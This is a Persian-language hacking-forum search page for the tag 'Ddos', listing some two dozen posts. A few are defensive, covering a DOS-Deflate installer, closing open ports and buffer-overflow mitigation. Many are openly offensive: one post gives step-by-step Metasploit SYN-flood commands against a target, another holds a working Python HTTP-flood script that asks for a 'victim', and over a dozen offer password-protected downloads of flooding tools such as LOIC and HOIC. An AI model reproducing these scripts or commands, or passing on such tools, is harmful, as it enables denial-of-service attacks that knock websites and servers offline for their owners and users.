رفتن به مطلب
بازگشایی انجمن! ×
GuardIran

جستجو در تالارهای گفتگو

در حال نمایش نتایج برای برچسب های 'Ddos'.

  • جستجو بر اساس برچسب

    برچسب ها را با , از یکدیگر جدا نمایید.
  • جستجو بر اساس نویسنده

نوع محتوا


تالارهای گفتگو

  • انجمن گاردایران
    • قوانین و اطلاعیه های سایت
    • اخبار هک و امنیت
    • انتقادات و پیشنهادات
    • بخش خصوصی
    • بخش ویژه - VIP
    • بخش زیر زمینی
  • سوال و جواب های عمومی
    • سوال و جواب های نفوذ به سایت ها و سرورها و روشهای مقابله
    • سوال و جواب های امنیت سیستم های شخصی
    • سوال و جواب های برنامه نویسی
    • سوال و جواب های ابزارهای امنیتی
    • سوال و جواب های شبکه
    • سوال و جواب های مدیریت محتوا و وبلاگ ها
    • سوال و جواب های بخش Trojan , Rat , Keylogger
    • سوال و جواب های سیستم عامل ها
    • سوال و جواب های امنیت ایمیل های شخصی
    • سوال و جواب الکترونیک
    • سوال و جواب های موبایل
    • سوال و جواب های متفرقه
  • انجمن نفوذ و امنیت
    • آموزش های تصویری
    • آموزش های تصویری نفوذ به سیستم های شخصی و روشهای مقابله
    • آموزش های تصویری سایت ها و سرورها و روشهای مقابله
    • آموزشهای تصویری شبکه و روشهای مقابله
    • حملات شبکه و راههای مقابله
    • DOS , DDOS
    • ویروس ها و تروجان ها
    • متاسپلویت Metasploit
    • ابزارهای امنیتی
    • Shell Script
    • آسیب پذیری های وایرلس
    • اکسپلویت
    • باگ های امنیتی
    • امنیت ایمیلهای شخصی
    • تارگت های تمرینی
    • اسکنرها و ابزارهای هکینگ
  • بخش کرک و رمزنگاری
    • ابزار کرک
    • مقالات و آموزشهای کرک
    • مقالات و آموزشهای رمزنگاری
    • ابزارهای رمزنگاری
    • پروکسی لیست
    • پسورد لیست و کمبو لیست
    • کانفیگ
    • اکانت های کرک شده
  • برنامه نویسی
    • برنامه نویسی
    • برنامه نویسی تحت وب
  • بخش موبایل
    • بخش مخصوص موبایل
    • هک موبایل
  • شبکه
    • Cisco سیسکو
    • نتورک پلاس Netwok+
    • مایکروسافت Microsoft
    • میکروتیک Microtics
    • مجازی سازی
    • ابزارهای شبکه و مانیتورینگ
    • فایروال
  • سیستم عامل
    • لینوکس
    • ویندوز
    • کالی لینوکس Kali Linux
    • مکینتاش
  • الکترونيک و روباتيک
    • الکترونيک
    • ميکروکنترلرها و پروسسور ها
    • نرم افزار هاي تخصصي برق و الکترونيک
    • روباتيک
  • گرافيک
    • فتوشاپ
    • فلش
  • متفرقه
    • بحث آزاد

وبلاگ‌ها

چیزی برای نمایش وجود ندارد


جستجو در...

نمایش نتایجی که شامل...


تاریخ ایجاد

  • شروع

    پایان


آخرین بروزرسانی

  • شروع

    پایان


فیلتر بر اساس تعداد...

تاریخ عضویت

  • شروع

    پایان


گروه


About Me

  1. دوستان برای جلوگیری از حمله های سایبری و جلوگیری دیداس و نفوذ به سایت چندین راه وجود داره. که کار امد ترین راه و بهترین نصب فایروال است ( دیوار اتشی). برای راحتی کار ها بهتره که وبسایت خود رو رو وردپرس بسازین با هاست اختصاصی. راستی شما میتونید با کد فعال سازی اگر کسی دیداس ببزنه یعنی درخواست های زیادی از سرور ما بکنه ایپیش رو بن کنین هم خودش رو بدخت کنین هم از اتک جلوگیری کنید البته اگه جاوا اسکریپت ان خاموش باشه روی طرف کار نمیده ولی روی بیشتر ادما روشن خوشبختانه و چند درصد خاموش کردن چون جاوا اسکریپت چیزه خوبی هست اما بزارین من این کد رو برای شما قرار بدم تا از دیداس جلوگیری کنید. . تعدا کانکشن رو در قسمت /usr/local/ddos/ddos.conf خودتون مشخص کنید . کد: #!/bin/sh if [ -d '/usr/local/ddos' ]; then echo; echo; echo "Please un-install the previous version first" exit 0 else mkdir /usr/local/ddos fi clear echo; echo 'Installing DOS-Deflate 0.6'; echo echo; echo -n 'Downloading source files...' wget -q -O /usr/local/ddos/ddos.conf [Hidden Content] echo -n '.' wget -q -O /usr/local/ddos/LICENSE [Hidden Content] echo -n '.' wget -q -O /usr/local/ddos/ignore.ip.list [Hidden Content] echo -n '.' wget -q -O /usr/local/ddos/ddos.sh [Hidden Content] chmod 0755 /usr/local/ddos/ddos.sh cp -s /usr/local/ddos/ddos.sh /usr/local/sbin/ddos echo '...done' echo; echo -n 'Creating cron to run script every minute.....(Default setting)' /usr/local/ddos/ddos.sh --cron > /dev/null 2>&1 echo '.....done' echo; echo 'Installation has completed.' echo 'Config file is at /usr/local/ddos/ddos.conf' echo 'Please send in your comments and/or suggestions to echo cat /usr/local/ddos/LICENSE | less نصبش رو هم حتماً بلدید : کد: wget [Hidden Content] chmod 0700 install.sh ./install.sh برای حذف کردن کد: wget [Hidden Content] chmod 0700 uninstall.ddos ./uninstall.ddos در مسیر زیر هم میتوانید تنظیمات پیشفرض را ویرایش کنید کد: /usr/local/ddos/ddos.conf دستور ویرایش فایل کد: vi /usr/local/ddos/ تعداد کانکشن هر آی پی به سرور به طور پیش فرض 150 مدت زمان بلاک بودن هر آی پی به طور پیش فرض 10 دقیقه زمان اجرای اسکریپت به طور اتوماتیک هر 1 دقیقه ارسال ایمیل هنگام بن شدن هر آی پی با این دستور هم میتونین تعداد کانکشن های به سرور رو مشاهده کنید کد: netstat -n | grep :80 |wc - دوستان کد ها کامل هستن اگر کد ها مشکل داشتن بگین ویرایش کنم البته من تست کردم هیچ مشکلی نداشت بزودی پست ویرایش پیدا میکنه و اموزش نصب فایروال گذاشته میشه با تشکر از این که وقتتون رو گذاشتین یا حق.تیم امنیتی گارد ایران
  2. سلام دوستان این مطلب مربوط به DDOS کردن تارگت با استفاده از متاسپلویت می باشد . 1.اول برای شروع DDOS نیاز به ip داریم اگر تارگت شما سایت می باشد با استفاده از دستور (ping :www.yourwebsite.com) آی پی سایت مورد نظر رو میگیریم. 2.در ترمینال msfconsole را تایپ کنید و منتظر بمانید. 3.بعد دستور use auxiiliary/dos/tcp/synflood را تایپ کنید. 4.بعد با دستور set RHOST (iptarget س را تایپ کنید . 5.حالا با استفاده از دستور run و یا exploit شروع به اتک کنید.
  3. GHOST

    حمله هکرها به Staminus

    هکرهای اینترنتی با حمله به شرکتی به نام «Staminus» نه تنها وب گاه آن را از کار انداخته اند، بلکه برخی اطلاعات حساس را از آن سرقت کرده اند. خدمات این شرکت در زمینه مقابله با حملات داس است. در جریان این حملات که به «Denial of Service» هم شهرت دارند، ترافیک زیادی به سرورهای وب گاه موردحمله تحمیل می شود تا آن وب گاه به طور کامل غیرقابل دسترس شود. Staminus به وب گاه هایی که مورد این حملات قرار می گرفتند کمک می کرد تا با آن مقابله کنند؛ اما حالا خود Staminus قربانی این حملات شده و تا شب گذشته به طور کامل آفلاین بوده است و مهاجمان اطلاعات حساسی را از آن سرقت کرده اند که از جمله آن ها می توان به اطلاعات پرداخت مشتریان، اسامی کاربری و کلمات عبور اشاره کرد. هنوز انگیزه این حملات مشخص نیست؛ اما برخی کارشناسان علت این کار را سیاسی می دانند و برخی نیز معتقدند هکرها از این طریق تلاش کرده اند امنیت و توانایی Staminus را زیر سؤال برده و مشتریان آن را دلسرد کنند. این شرکت قول داده امنیت خود را تقویت کند و اقداماتی برای شناسایی عوامل این حملات هم آغاز شده است.
  4. R3DN4X314

    تکنیک Slow Post و حمله SYN/ACK

    تکنیک HTTP Slow Post و حمله SYN/ACK flood حملاتی که قصد آنها فقط و فقط جلوگیری از سرویس دهی می باشند را اصطلاحا DOS می گویند هر گاه این حملات به صورت توزیع شده و هماهنگ توسط زامبی ( کامپیوتر های قربانی ) اجرا شوند به آن DDOS ) distributed DOS ) می گویند. در بسیاری از کتاب های مختلف و مقالات ارائه شده در کنفرانس های نفوذ گری سعی کرده اند برای آنها دسته بندی ای سازمان یافته در نظر بگیرند و به آنها قالبی آکادمیک دهند ، اما باید اعتراف کرد که این دسته بندی ها اغلب حملات ریز شده ای هستند که در گروهان خود فقط خودشان حضور دارند و زیر مجموعه ای برایشان یافت نمی شود . به همین دلیل ما در مورد این دسته بندی ها فقط به DOS و DDOS بسنده می کنیم حملات تکذیب سرویس تنها به جهت خراب کاری و قطع دسترسی نمی باشند ، برخی از آنها میتوانند کار بردهای عجیب دیگری را برایتان به ارمغان آورند : زمانی که میخواهید یک سیستم نظر دهی را مختل کرده و نظر خود را در آن در بالاترین امتیاز قرار دهید زمانی که میخواهید امتیاز سایت خود را در گوگل توسط حملات Black SEO بالا ببرید و در صفحه اول جستجو جای دهید ( البته بستگی به قوانین گوگل در هر بازه زمانی‌ دارد ) هر گاه که دست رسی به اخبار یک خبر گزاری ، دسترسی به پول مشتریان یک بانک ، به هم ریختن و یا کند کردن ترافیک یک کشور و ... را مد نظر قرار دهید همواره در حال عملیات flooding ( جاری کردن سیل ) هستید . هر گاه نقض پروتکلی رخ دهد و یا روشی که بتواند سیستم ای را درگیر خود کند ، پیدا کنید ، در اصل می توانید حملات DOS و یا DDOS انجام دهید نام این تکنیک حمله در اصطلاح ، تکنیک HTTP Slow Post میباشد ، با استفاده از این روش حمله، عملاً درخواست هایی خاص برای دریافت اطلاعات به سمت سرور ارسال می شود . این حمله نیز سال 2008 با استفاده از یکی از نقص های پروتکل HTTP کشف و مورد سوء استفاده قرار گرفت . قبل از شروع با هم نگاهی به فرایند های انجام ارسال و دریافت درخواست بیاندازیم : ارتباطات تحت وب، با استفاده از پروتکل های مختلفی امکان پذیر است که پر استفاده ترین پروتکل، پروتکل HTTP می باشد ، در ارتباطات HTTP ، اطلاعاتی از سمت سرور به مشتری و بالعکس در قالب یک سری پیام ، ارسال می شود و در این میان پیام های HTTP به دو دسته تقسیم می شود HTTP Request که از طرف کلاینت به سرویس دهنده ارسال می شود و HTTP Response ها که از طرف سرویس دهنده به مشتری ارسال می گردد که آنها همگی در قالب یک پروتکل استاندارد با RFC 822 ارسال و دریافت می شوند پیغام های ارسالی در قالب یک سری دستورات کنترل کننده به نام header ارسال می شوند و در پاسخ نیز سرویس دهنده دستورات کنترلی مربوط به خودش را در درون header ها قرار می دهد و ارسال می کند شکل کلی یک بسته HTTP به صورت زیر است : با توجه به اطلاعات قرار داده شده در سرآیند ها ، سرویس دهنده و مشتری در مورد نحوۀ ادامه ارتباط با یکدیگر تصمیم خواهند گرفت . یکی از فیلد های سرآیند که در هر دو نوع بسته های پیام HTTP در حالت موجود است، Content-Length می باشد . این فیلد، مشخص کنندۀ طول اطلاعاتی است که در بدنۀ اصلی پیام قرار می گیرد. در حالت ارسال اطلاعات به صورت POST این اطلاعات از طرف کلاینت مشخص شده ، و در همه حالات برگشت اطلاعات از سمت سرور این مقدار نشان دهنده مقدار اطلاعات برگشتی است . در صورتی که طول این فیلد، بیشتر از طولی باشد که به عنوان حد اکثر طول پیام در نظر گرفته شده، گیرندۀ پیام، منتظر می ماند تا ادامۀ پیام در بسته های بعدی دریافت شود . در طول زمان انتظار، نشستی که برقرار شده، به صورت باز باقی خواهد ماند . نکتۀ قابل توجه در این نوع حمله، استفاده از ویژگی خودِ پروتکل http است. در این حمله، سرآیند بسته های http که برای سرور ارسال می شود، به گونه ای تنظیم می شود که سرور همواره در حالت انتظار برای دریافت ادامه اطلاعات باقی خواهد ماند. بدین ترتیب، میزان بار تحمیل شده به سرور، به مرور افزایش یافته و علیرغم اینکه ترافیک خاصّی در شبکه مبادله نمی شود )بر عکس حملات DDOS که پهنای باند قربانی را مشغول کرده و ترافیک را در اصطلاح میخورند ( سیستم سرور به علّت افزایش بیش از حدّ ارتباطات کم سرعت، قادر به پاسخگویی به مشتریان واقعی نخواهد بود ) سرویس دهنده IIS به صورت پیش فرض یک مقدار مشخص از تعداد کانکشن ها را میتواند در لحظه پشتیبانی کند چون برای هر کدام از این Thread ها یا همان درخواست های موازی فرستاده شده ، یک مقدار CPU و RAM اختصاص میدهد . در صورت پر شدن ظرفیت های سیستم ، دیگر قادر به پاسخ گویی به شما نیست از دیدگاه فنی، این حمله با تنظیم فیلدِ Content-length در سرآیند بسته های HTTP Request انجام خواهد شد. بدین ترتیب با تنظیم این فیلد به یک مقدار بسیار بزرگ ( مثلاً 1,000,000 بایت ) به سرور اعلام می کنیم که اطلاعاتی که قرار است به سرور ارسال شود، حجم بالایی دارند. از طرفی پس از برقراری ارتباط و ارسال کامل بسته های HTTP Request اطلاعاتی که بنا بود به سرور ارسال شود، در قالب چندین هزار بستۀ کوچک و با فاصلۀ زمانی نسبتاً زیاد ( هر 110 ثانیه 1 بایت ) از یکدیگر به سمت سرور ارسال میشود. لازم به ذکر است که در این حمله، از شیوۀ POST برای برقراری ارتباط با سرور استفاده می شود. بدین ترتیب هر ارتباط کاملاً پایدار بوده و دقیقاً مشابه زمانی است که یک کاربر قصد مرور اطلاعات سرور را از طریق خطوط کم سرعت Dial-Up داشته باشد . این حمله در کنفرانس BlackHat سال 2011 به صورت کلی معرفی شد و نکتۀ حائز اهمیت در مورد آن، این است که این حمله عملاً با سوء استفاده از خودِ پروتکلِ HTTP انجام می شود مراحل انجام این حمله : ابتدا می بایست آدرس یک صفحه از سایت مورد نظر که حاوی فرم های قابل استفاده در متد POST می باشد را شناسایی نمود البته این کار برای محکم کاری انجام می شود سپس می توان با تنظیم پارامتر های دلخواه و ساخت بسته های مورد نظر، حمله را شروع نمود بدین ترتیب با شروع حمله و رسیدن تعداد ارتباطات به میزان تنظیم شده، سیستم سرور دیگر قادر به پاسخگویی به درخواست های جدید نخواهد بود. حمله ای ساده و در عین حال عجیب که از ضعف ساختار پروتکل TCP/IP بهره می برد . زمانی که یک دست تکانی 3 مرحله ای در حال انجام است ، یک SYN از طرف ما و یک SYN/ACK از سمت سرور به ما ارسال می شود در این حالت اصطلاحا سرور منتظر می ماند تا دست تکانی انجام شود و ما یک بسته ACK به سمتش ارسال کنیم در صورتی که ما این دست تکانی را 2 مرحله رها کنیم ، سرو connection را در حالت half-open نگه می دارد و اگر تعداد این اتصال ها از مقدار مجاز تعریف شده بیشتر شود ، سرور دیگر connection جدیدی را نمی پذیرد و عملا از سرویس دهی ساقط می گردد . به این حمله اصطلاحا SYN/ACK flood می گویند ، حمله مشابه دیگری نیز وجود دارد که با نام SYN Flood که در آن فقط بخش اول دست تکانی انجام می پذیرد ، با این وصف که IP استفاده شده در source IP جعلی می باشد . سرور بعد از ارسال بسته ای که حاوی فلگ SYN از طرف یک آدرس جعلی است ، یک بسته SYN/ACK ار سال می کند ، اما در این حالت بسته به سمت آدرس جعلی رفته و چون متعلق به او نیست حذف می شود مشکلات ناشی از حملات در لایه TCP و لایه IP به همین جا ختم نمی شود ، به عنوان نمونه حمله ای موسوم به Land Attack که در اصل آدرس مبدا و مقصد در سرآیند IP و پورت مبدا و مقصد در سرآیند TCP یکسان است . زمانی که قرار است دست تکانی با بسته SYN انجام پذیرد ، سیستم عامل جواب بسته SYN را به خودش می دهد و در این حالت در یک loop گرفتار می شود ( بسیاری از روتر ها و سوئیچ های سیسکو که به درستی کانفیگ نشده اند ، در دام این حمله گرفتار می شوند )
  5. گوگل داره پروژه ای رو طراحی میکنه که دیگه داس و دیداس کاربردشو از دست میده! توضیحش اینه که ترافیک هایی رو که این روش ها روی دیتا بیس ها میفرستن مستقیم منتقل میکنه به سرور های حجیم گوگل! لینک پیج گوگل حالا سوالم اینه که میشه مسیر انتقال دیتا رو برعکس کرد یعنی از گوگل بریزه تو اون سایته ! در واقع وقتی بسته های آیپی رو داری تو بافر اون سرورمیریزی اکسپلویتی و اسکریپتی روهم میدی که دیتاهای گوگل روتو بافراون سایت خاص بزیره!
  6. سلام عرض ادبو احترام امروز در خدمت شما با نحوه اسکن کردن پورت های باز و نحوه بستن انها هستیم همونطور که خودتون اطلاع دارید اگر پورت هاتون باز باشه به راحتی حملات DDos برای روی سیستم شما قابل انجام هست و DDos میشید برای مقابله با ان یکی از روش بستن پورت خوب حالا برای فهمیدن پورت های باز چه کنیم ؟ ابتدا از طریق منواستارت ویندوز cmd رو بزنید و عبارت ipconfig رو بزنید و ipv4 address رو کپی نمایید و یا یادداشت نمایید خوب حالا برای اسکن کردن از سیستم عامل کالی و ... کمک میکنیم و ترمینال رو باز میکنیم و کد nmap -F ipv4 address رو وارد کنید و سپس اینتر کنید کمی بهش وقت بدید بعد خودش میگه چه پورت هایی باز هستند و شما برای بستن انها به contorl panel برید و windows firewall رو بزنید و advanced settings برید و و از قسمت های inbound rules و outbound Rules port های باز رو ببندید با استفاده new rule اد کنید و در qutbound هم nudew qut bound کنید و پورت هارو یکبار به صورت tcp و یا udp اد کنید از طریق رفتن به new rule و یا new qut bound اد کنید و گزینه port رو بزنید و بعد protocol and ports و بعد هم یکبار به صورت tcp و یا udp اد کنید و names هم اسم پورت قرار بدید (موفق باشین)
  7. amir00755

    HLFlooder

    سلام و عرض ادبو احترام به کل سایت بزرگ گارد ایران. یدونه برنامه ی کاربردی اوردم به نام HLFlooder من که ازش خوشم اومد اومیدوارم شماهم خوشتون بیاد. Pass:guardiran.org HLFlooder_public.rar
  8. abarestan

    اسکریپت دیداس به زبان python

    با سلام خدمت دوستان براتون یک اسکریپت خوب در زمینه DDoS گذاشتم. زبان اسکریپت : پایتون. #/usr/bin/Python # -*- coding: utf-8 -*- import sys import time import threading import urllib time.sleep(3) a=1 b=threading.Lock() class dos(threading.Thread): def __init__(self, host, threads): threading.Thread.__init__(self) self.host = host self.threads = threads def run(self): global a global b b.acquire() print "\n chuẩn bị -> {0}".format(self.threads) b.release() while 1 == a: try: urllib.urlopen(self.host).read try: urllib.urlopen(self.host).read except: pass except: pass b.acquire() print " số lượng {0}\n".format(self.threads) b.release() sys.exit() try: threads=input(" Số lượng(100000) : ") except NameError: sys.exit() while True: host=raw_input("\n victim : ") print "\n Đang kiểm tra website \n" time.sleep(2) try: urllib.urlopen(host) except IOError: print "\nKhông thể kết nối vào victim\n" sys.exit() else: break print "\n"*100 c=raw_input(" Bấm Y để tấn công N để dừng ( Y/N ) > ") if c=="Y": pass elif c=="N": print "\n Thoát.\n" sys.exit() for A in xrange(threads): dos(host, A+1).start() a=0 print " Tấn công thành công \n" این هم نحوه کار با این اسکریپت: [Hidden Content] خیلی خوب میشد یک تالار برای اسکریپت های دیداس داشتیم. تشکر نشانه رضایت شماست
  9. DeMoN

    پکیج دیداسر ها

    سلام خدمت دوستان عزیز گارد ایران.براتون پکیجی حاوی برنامه LOICv1.2-XOICV1.3-HOICV1.2-GOOD BYE V5.2رو آماده کردم.مجموعه ای از بهترین ابزار حملات تکذیبی.امیدوارم از این پکیج لذت ببرین.با تشکر pass:guardiran.org DDOS(hoic-xoic-loic-good bye).rar
  10. DeMoN

    ابزار داس Razors DoS

    سلام عزیزان گارد ایران.اینم یکی دیگه از قدرتمندترین های ابزار های داس و دیداس،کار با این ابزار سبک و قدرتمند بسیا ساده هست.امیدوارم از این ابزار نهایت لذت رو ببرین.تشکر Pass:guardiran.org razors_dos_tool _1.1.zip
  11. DeMoN

    ابزار داس ZDoS

    سلام عزیزان گارد ایران.براتون برنامه ZDoS،یکی دیگه از ابزار های قدرتمند حملات داس رو آماده کردم.امیدوارم از این ابزار نهایت لذت رو ببرین.تشکر Pass:guardiran.org zDoS.zip
  12. DeMoN

    ابزار داس ایکس داس

    سلام به عزیزان گارد ایران.براتون ابزار X DoS رو آماده کردم.ابزاری قدرتمنو و سبک در زمینه حملات داس.امیدوارم از این ابزار نهایت لذت رو ببرین.تشکر Pass:guardiran.org XDos.zip
  13. DeMoN

    دیداسر بلک اوت black out

    سلام خدمت عزیزان گارد ایران.براتون یکی دیگه از ابزار های قدرتمند حملات تکذیب سرویس به نام Black out رو آماده کردم.از اسمش معلومه چقدر خفنه.خخخخخخ.امیدوارم از این ابزار لذت ببرین.تشکر Pass:guardiran.org Black_Out_v1.0.zip
  14. با سلام خدمت دوستان عزیز.براتون آنونیموس داسر رو آماده کردم.آنونیموس داسر V1.2 در حال حاضر بهترین ابزار در زمینه حملات تکذیب سرویس میباشد.امیدوارم از این ابزار لذت ببرین.با تشکر Pass:guardiran.org anonymous DoSer.rar
  15. DeMoN

    داس اتکر آلفا

    سلام خدمت دوستان عزیز.برنامه داس اتکر آلفا رو براتون آماده کردم.یکی دیگه از ابزار های قدرتمند در زمینه حملات تکذیبی.امیدوارم از این برنامه نهایت لذت رو ببرین.با تشکر Pass:guardiran.org Dos Attacker Alpha 1.1.rar
  16. با سلام خدمت عزیزان گارد ایران.براتون برنامه سرور دس(server death)رو آماده کردم.ابزاری قدرتمند در زمینه حملات مبتنی بر داس برای سرورها.امیدوارم از این برنامه لذت ببرین.با تشکر Pass:guardiran.org ServerDeath.rar
  17. DeMoN

    نرم افزار ID DOS

    سلامی دوباره خدمت دوستان عزیز گارد ایران.خوب امروز براتون یک ابزار قدرتمند دیگه به نام آی دی داس رو آماده کردم.ابزاری قدرتمند و با کارایی بالا.طرز کار با این ابزار بسیار ساده هست و مثل بقیه ابزار های دیداس و داس همون نعداد پاکت ها و آی پی سرور مورد نظر رو لازم داره.امیدوارم از این ابزار نهایت استفاده رو ببرین.با تشکر Pass:guardiran.org ID_DOS.rar
  18. DeMoN

    سیستم دیداس( system DDoSv5.0)

    با سلام خدمت دوستان گل گارد ایران.امروز براتون یک ابزار قدرتمند و بسیار کاربردی به نام سیستم دیداس رو آماده کردم.ابزاری قدرتمند در زمینه حملات تکذیبی به سیستم های شخصی.چطوری کار میکنه؟شما فقط کافیه آی پی قربانی مورد نظرتون رو داشته باشین،پورت و تعداد پاکت هارو انتخاب میکنین و شروع.امیدوارم از این ابزار نهایت لذت رو ببرین.با تشکر. Pass:guardiran.org System DDoS v0.5.rar
  19. DeMoN

    نرم افزار حمله داس http flooder

    سلام خدمت دوستان عزیز و ارجمند گروه گاردایران.امروز براتون ابزار http flooder رو آماده کردم.امیدوارم از این ابزار نهایت لذت رو ببرین.با تشکر از دوستان عزیز گاردایران. Pass:guardiran.org HTTPFlooder.rar
  20. DeMoN

    ایران داس IRAN DOS

    سلام خدمت تمامی دوستان گارد ایران.امروز براتون برنامه ایران داس که در حال حاظر یکی از قویترین ابزارهای داس میباشد رو براتون آماده کردم.با تشکر Pass:guardiran.org IRAN DoS.rar
  21. در این تاپیک قصد دارم تا حملات DDoS , نحوه کار و راه های مقابله DDoS رو براتون شرح بدم لطفا قوانین رو رعایت کنید و برای جلوگیری از پراکندگی آموزش ها اسپم ندید و اگر سوالی بود در بخش سوالات مطرح کنید سرفصل آموزش ها شامل : - DDoS چیست ؟ و حملات آن چگونه صورت میگیرد ؟ - حملات DDoS توزیع شده ( با استفاده از Botnet ها و بدافزارها ) - طبقه بندی حملات DDoS ( پنج نوع مهم و کلی ) - آموزش حمله DDoS مبتدی تا پیشرفته ( با استفاده از Botnet ها ) - راه های مقابله ( DDoS Protection ) و ... رمز تمامی فایل ها : guardiran.org موقق باشین .
  22. چگونه ضعف در برنامه نویسی , می تواند باعث دسترسی به یک نرم افزار یا از کارانداختن اش شود ؟ حملاتی که آنها را سرریز بافر یا Buffer Overflow Attack می نامند . بافر چیست؟ اگر برنامه نویس باشید با این اصطلاح آشنایی دارید , به خصوص اگر با زبان C کار می کنید بافر قسمتی از حافظه است که به طور موقت برای نگه داری اطلاعات یک نرم افزار اختصاص یافته است اطلاعات پیش از رسیدن به محل اصلی در مکانی به نام بافر به صورت موقت ذخیره میشوند بافر معمولا یک ظرفیت از پیش مشخص شده دارد که توسط برنامه نویس تعیین می شود . تصور کنید نرم افزاری دارید که یک بافر با سایز ثابت 128 بایت دارد حالا اگر یک مهاجم 1000 بایت دیتا برای این بافر ارسال کند چه اتفاقی رخ میدهد؟ ظرف شما از آب پر می شود و سر ریز می کند در چنین حالتی یک نرم افزار واکنش های متفاوتی از خودش بروز می دهد که قابل پیش بینی نیست . برای مثال سرور ایمیل شما تحت چنین حمله ای قرار می گیرد و بر اثر سرریز بافر کرش کرده و از کار می افتد ؛ سرریز بافر یک راه شایع و خطرناک برای حمله به سرویس ها و دیتابیس هاست اما ماجرا به همینجا ختم نمیشود ؛ در ادامه از طریق این حملات می توان کنترل کامپیوتر میزبان را هم به دست گرفت ! تصور کنید سرویس ایمیل شما بر مبنای یونیکس کار می کند و با Root فعال است این سرویس در فرم ورود به سایت آدرس ایمیل کاربر را بررسی می کند حالا هکر به جای آدرس ایمیل یک دستور ارسال می کند که سبب سرریز بافر شده و شامل دستورهای یونیکسی است که باعث می شود کامپیوتر هدف آنها را اجرا کند با این کار هکر دسترسی کامل سرور را در دست می گیرد * این دستورها معمولا با زبان اسمبلی ارسال می شوند و ساختن مجموعه دستوری که بتواند در کامپیوتر هدف اجرا شود کار بسیار سختی است اما دستورهای حمله به بسیاری از اپلیکیشن ها از قبل نوشته شده و با یک جستجو می توان آن را پیدا کرد , بنابراین حمله برای یک هکر کار سختی نخواهد بود برای جلوگیری از این حملات به چند راهکار اساسی عمل کنید : - اگر برنامه نویس هستید فراموش نکنید که از همان ابتدای کد نویسی و طراحی , امنیت را یک گوشه از ذهن تان قرار بدهید - تمام ورودی های کاربر را از قبیل فرم ها , بررسی کنید تا فقط اطلاعات مورد نظر شما امکان عبور را داشته باشند - نرم افزارها و اپلیکیشن ها را آپدیت نگه دارید - تست نرم افزارتان را برای این گونه حملات فراموش نکنید - و در پایان سرویس هایی را که استفاده نمی کنید , غیرفعال کنید .
  23. kingdeface

    آموزش حملات داس Dos Attack

    در این کتاب که نوشتم وارد مباحث گسترده تری از حملات Dos می شویم و حملات dos رو مقایسه می کنیم و گذری هم بر مبحث Syn Flood داریم انشاا.. در مقاله های بعدی کاملتر به این مباحث خواهیم پرداخت . دوستانی که مقاله و آشنایی های قبلی با این دسته از حملات ندارند می تونند از اینجا مطالبی که بنده نوشتم رو بخوانن و آشنایی پیدا کنند . پسورد فایل : guardiran.org . Dos Attack.rar
  24. kingdeface

    انواع و بررسی حملات DOS - DDOS

    DOS Attack متداول ترین و مشهورترین نوع حملات Dos ، زمانی تحقق می یابد که یک مهاجم اقدام به ایجاد یک سیلاب اطلاعاتی می کند و وقتی که دیتای زیادی درشبکه درحال انتقال می باشد امکان حمله داس بیشتر خواهد شد . زمانی که شما آدرس URL یک وب سایت خاص را ا زطریق مرور گر خود تایپ می نمایید درخواست شما برای سرویس دهنده ارسال می گردد و سرویس دهنده هرلحظه قادربه پاسخگویی به حجم محدودی از درخواست ها می باشد ، بنابراین اگریک مهاجم با ارسال درخواستهای متعدد و سیلاب گونه باعث افزایش حجم عملیات سرویس دهنده گردد ، قطعا امکان پردازش درخواست شما برای سرویس دهنده وجود نخواهد داشت . حملات فوق از نوع DOS می باشند ، چرا که امکان دستیابی شما به سایت مورد نظر سلب شده است و یک مهاجم می تواند با ارسال پیام های الکتریکی ناخواسته که ازآن با نام Spam یاد می شود حملات مشابهی رامتوجه سرویس دهنده پست الکترونیک نماید. هر account پست الکترونیک (صرف نظر از منبعی که آنان را دراختیارشما قرارمی دهد، نظیر سازمان مربوطه ویا سرویسهای رایگانی نظیر یاهو دارای ظرفیت محدودی می باشند) پس از تکمیل ظرفیت فوق ، عملا " امکان ارسال Email دیگری به account فوق وجود نخواهد داشت و مهاجمان با ارسال نامه های الکترونیکی ناخواسته سعی می نمایند که ظرفیت account مورد نظر را تکمیل و عملا" امکان دریافت email های معتبر را از account فوق سلب نمایند . حملات Dos هزینه بالایی دارند و این حملات می توانند از یک شبکه محلی یا از بیرون شبکه شروع شوند و نیز یک حمله Dos را از طریق تلاش آشکار حمله کننده برای جلوگیری از استفاده کاربران قانونی یک سرویس از آن سرویس ، شناسایی می کنند. ازجمله این تلاش ها می توان به موارد زیر اشاره کرد: * انواع طغیانهای شبکه شامل طغیان های TCP , UDP : وICMP که ترافیک قانونی سایت را مختل می کند. * تلاش در جهت قطع ارتباط دو ماشین ودر نتیجه عدم امکان استفاده ازسرویس آنها. * تلاش در جهت ممانعت از دسترسی فردی خاص به یک سرویس . * تلاش برای خرابکاری در ارائه سرویس به سیستم یا شخص خاصی. از دیدگاه فنی ، حملات DOS به دو دسته زیر تقسیم می شوند : ** حمله ای که مستقیما منجر به توقف سرویس های ماشین می شود . ** حمله ای که منجر به اشباع یک سرویس دهنده و تلف شدن منابع آن شود. .
×
×
  • ایجاد مورد جدید...